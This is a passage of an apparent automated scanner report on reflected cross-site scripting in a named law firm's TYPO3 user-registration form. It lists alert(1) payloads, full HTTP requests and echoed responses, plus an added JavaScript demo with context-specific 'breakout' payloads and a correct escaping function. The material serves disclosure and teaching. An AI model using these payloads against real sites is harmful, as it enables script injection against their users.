   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0e512f<script>alert(1)</script>d93c4114a89');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.170. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B5%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B5%5D request parameter is copied into the application's response without HTML encoding: the payload bec11<script>alert(1)</script>fe856d5f00 was submitted in the FE%5Bfe_users%5D%5B5%5D parameter and was echoed unmodified. As the response excerpt below shows, the reflection point is the single-quoted string argument of an updateForm(...) call inside an inline script block, not plain text between tags; since the HTML parser ends a <script> element at the first </script> it sees regardless of JavaScript string syntax, an unencoded </script> in the echoed value terminates the script block and hands the remainder of the value to the HTML parser.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0bec11<script>alert(1)</script>fe856d5f00&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27282

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0bec11<script>alert(1)</script>fe856d5f00');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.171. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B6%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B6%5D request parameter is copied into the application's response without HTML encoding: the payload 27942<script>alert(1)</script>05f26062564 was submitted in the FE%5Bfe_users%5D%5B6%5D parameter and was echoed unmodified. As the response excerpt below shows, the reflection point is the single-quoted string argument of an updateForm(...) call inside an inline script block, not plain text between tags; since the HTML parser ends a <script> element at the first </script> it sees regardless of JavaScript string syntax, an unencoded </script> in the echoed value terminates the script block and hands the remainder of the value to the HTML parser.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=027942<script>alert(1)</script>05f26062564&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','027942<script>alert(1)</script>05f26062564');
   /*]]>
...[SNIP]...

4.172. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Baddress%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Baddress%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef89\'%3balert(1)//3af9dc914c6 was submitted in the FE%5Bfe_users%5D%5Baddress%5D parameter. This input was echoed as 7ef89\\';alert(1)//3af9dc914c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated. Note that in this response the string is an argument of an updateForm(...) call written on a single line, so the scanner's payload, which terminates the string and then comments out the rest of the line with //, also comments out the ); that closes the call; the script block then fails to parse and the alert does not fire as submitted. A payload that closes the call before the comment, such as \');alert(1)//, executes. The fix is to escape the backslash as well as the quotation marks before placing the value in the string literal, or better, to encode every non-alphanumeric character of the value as a \xHH or \uHHHH JavaScript escape, which also prevents an embedded </script> from ending the script element.
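The escaping failure described above, and the <script> reflections in the FE[fe_users][3] to FE[fe_users][6] findings earlier on this page, can be reproduced offline. The JavaScript below is an added example written for this page; it is not code from the XSS.CX report, from the scanner, or from the TYPO3 extension that renders the form, and every function name in it is hypothetical. escapeQuotesOnly models the quote-only escaping the responses imply, encodeForJsString is a correct encoder for the same context, renderScript and runPage stand in for the page and for the browser's HTML tokenizer. The field names and the two scanner payloads are copied from the report's own request and response lines; the two "breakout" payloads are constructed here for the updateForm(...) argument context. The example goes one step beyond the report: it shows that the scanner's canned payloads leave the script block unparseable in this particular context, that payloads tailored to the context execute, and that the encoder neutralises both.

```javascript
// Added example for this report page; not code from XSS.CX, the scanner or the TYPO3
// front-end user registration extension. All function names are hypothetical.

// Quote-only escaping, as inferred from the report's responses: a backslash is put
// before ' and ", but an attacker-supplied backslash passes through untouched.
function escapeQuotesOnly(value) {
  return String(value).replace(/['"]/g, (q) => '\\' + q);
}

// Correct encoder for a value placed inside a single-quoted JavaScript string
// literal in an inline <script>: backslash, quotes, line terminators and the
// characters the HTML parser acts on (< > / &) all become \uXXXX escapes, so the
// emitted source can never contain a bare quote, a stray backslash or "</script>".
function encodeForJsString(value) {
  return String(value).replace(/[\\'"<>\/&\r\n\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The fragment the report shows: one updateForm(...) call inside an inline script.
function renderScript(field, value, encode) {
  return "<script>updateForm('fe_users_form','" + field + "','" +
    encode(value) + "');</script>";
}

// Minimal browser model. The HTML tokenizer ends a <script> element at the first
// "</script>" it meets, whatever the JavaScript inside looks like, so each element
// is executed on its own. updateForm and alert are stubs that record what happened;
// a script that does not parse counts as a syntax error and runs nothing.
function runPage(html) {
  const result = { alerts: 0, syntaxErrors: 0, formValues: {} };
  const elements = html.match(/<script>[\s\S]*?<\/script>/g) || [];
  for (const element of elements) {
    const src = element.slice('<script>'.length, -'</script>'.length);
    try {
      new Function('updateForm', 'alert', src)(
        (form, name, value) => { result.formValues[name] = value; },
        () => { result.alerts += 1; });
    } catch (e) {
      if (!(e instanceof SyntaxError)) throw e;
      result.syntaxErrors += 1;
    }
  }
  return result;
}

// Payloads: the two scanner payloads are taken from the report's request lines;
// the two "breakout" payloads are constructed here for the updateForm(...) context.
const SCANNER_SCRIPT_PAYLOAD = '0c8d1b<script>alert(1)</script>d23dadbefc1';
const SCANNER_QUOTE_PAYLOAD = "37ef89\\';alert(1)//3af9dc914c6";
const BREAKOUT_SCRIPT_PAYLOAD = '</script><script>alert(1)</script>';
const BREAKOUT_QUOTE_PAYLOAD = "3\\');alert(1)//";

function demo() {
  const numbered = 'FE[fe_users][3]';
  const address = 'FE[fe_users][address]';
  return {
    // The canned <script> payload closes the element at its </script>, leaving an
    // unterminated string literal behind: the block fails to parse, no alert.
    cannedScript: runPage(renderScript(numbered, SCANNER_SCRIPT_PAYLOAD, escapeQuotesOnly)),
    // Closing the element first and opening a fresh one does execute.
    breakoutScript: runPage(renderScript(numbered, BREAKOUT_SCRIPT_PAYLOAD, escapeQuotesOnly)),
    // \' survives as \\' and terminates the string, exactly as the response shows,
    // but the // also comments out the ');' that closes the call: syntax error, no alert.
    cannedQuote: runPage(renderScript(address, SCANNER_QUOTE_PAYLOAD, escapeQuotesOnly)),
    // Closing the call as well gives execution.
    breakoutQuote: runPage(renderScript(address, BREAKOUT_QUOTE_PAYLOAD, escapeQuotesOnly)),
    // The same inputs through the safe encoder: values round-trip, nothing executes.
    safeScript: runPage(renderScript(numbered, SCANNER_SCRIPT_PAYLOAD, encodeForJsString)),
    safeQuote: runPage(renderScript(address, BREAKOUT_QUOTE_PAYLOAD, encodeForJsString)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

runPage deliberately models only the one tokenizer rule that matters here (script data ends at the first </script>); the surrounding /*<![CDATA[*/ comment in the real page does not change that rule, since only a <!-- sequence puts the tokenizer into the escaped state. The point of the safe encoder is that it makes the reflected value inert in both parsers at once: the JavaScript parser sees only escape sequences, and the HTML parser never sees a < at all.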

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=37ef89\'%3balert(1)//3af9dc914c6&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:23:49 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
'FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','37ef89\\';alert(1)//3af9dc914c6');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateF
...[SNIP]...

4.173. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcity%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcity%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21752\'%3balert(1)//21ef1916b41 was submitted in the FE%5Bfe_users%5D%5Bcity%5D parameter. This input was echoed as 21752\\';alert(1)//21ef1916b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=321752\'%3balert(1)//21ef1916b41&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:24:46 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','321752\\';alert(1)//21ef1916b41');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm(
...[SNIP]...

4.174. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcompany%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcompany%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece68\'%3balert(1)//0b41804b4b8 was submitted in the FE%5Bfe_users%5D%5Bcompany%5D parameter. This input was echoed as ece68\\';alert(1)//0b41804b4b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3ece68\'%3balert(1)//0b41804b4b8&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:35 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_form','FE[fe_users][www]','');
   updateForm('fe_users_form','FE[fe_users][company]','3ece68\\';alert(1)//0b41804b4b8');
   updateForm('fe_users_form','FE[fe_users][image]','');
   updateForm('fe_users_form','FE[fe_users][disable]','0');
   updateForm('fe_users_form','FE[fe_users][date_of_birth]','');
   updateForm('fe_users
...[SNIP]...

4.175. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bemail%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bemail%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7283e\'%3balert(1)//d945f4f3b76 was submitted in the FE%5Bfe_users%5D%5Bemail%5D parameter. This input was echoed as 7283e\\';alert(1)//d945f4f3b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com7283e\'%3balert(1)//d945f4f3b76&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:54 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27504

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
address]','3');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com7283e\\';alert(1)//d945f4f3b76');
   updateForm('fe_users_form','FE[fe_users][gender]','0');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users
...[SNIP]...

4.176. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bgender%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bgender%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afa4\'%3balert(1)//fd66386815e was submitted in the FE%5Bfe_users%5D%5Bgender%5D parameter. This input was echoed as 1afa4\\';alert(1)//fd66386815e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

